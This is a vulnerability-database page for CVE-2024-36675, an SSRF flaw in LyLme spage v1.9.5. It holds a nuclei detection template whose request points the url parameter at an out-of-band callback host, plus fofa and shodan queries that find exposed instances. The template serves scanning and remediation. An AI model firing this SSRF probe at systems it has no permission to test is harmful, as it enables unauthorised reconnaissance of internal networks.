Lucene search
K

LyLme spage v1.9.5 - Server-Side Request Forgery

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

LyLme spage v1.9.5 has a high severity SSRF vulnerability via the url parameter in apply/index.php.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-36675
17 Jul 202511:50
circl
CVE
CVE-2024-36675
4 Jun 202421:31
cve
Cvelist
CVE-2024-36675
4 Jun 202421:31
cvelist
EUVD
EUVD-2024-36181
4 Jun 202421:31
euvd
NVD
CVE-2024-36675
4 Jun 202422:15
nvd
Positive Technologies
PT-2024-27118 · Unknown · Lylme Spage
4 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-36675
14 Feb 202505:37
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-36675
1 Aug 202500:00
vulncheck_kev
Vulnrichment
CVE-2024-36675
1 Jan 197600:00
vulnrichment
id: CVE-2024-36675

info:
  name: LyLme spage v1.9.5 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    LyLme spage v1.9.5 is vulnerable to server-side request forgery (SSRF) via the url parameter in apply/index.php. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests via the url parameter, potentially accessing internal resources.
  remediation: |
    Update LyLme spage to a version later than v1.9.5 that patches the SSRF vulnerability.
  reference:
    - https://github.com/Hebing123/cve/issues/44
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36675
  classification:
    epss-score: 0.01426
    epss-percentile: 0.69697
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-36675
    cwe-id: CWE-918
    cpe: cpe:2.3:a:lylme:lylme_spage:1.9.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: title="LyLme Spage"
    shodan-query: http.favicon.hash:-282504889
  tags: cve,cve2024,ssrf,lylme,spage,oast,oob,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/apply/index.php?url=http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(interactsh_protocol, "http")'
          - 'contains_all(body, "title\":", "icon\":")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100ce0964fc5f1755ef44753e46cbfb38bfbbd6f935e624ae114546c15b35acbb5c022100b89382ef9c88ebc24c3732c5dad4589b5dca8b1a1bbb53d801afdf02de2cc5c7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.1
EPSS0.01426
SSVC
11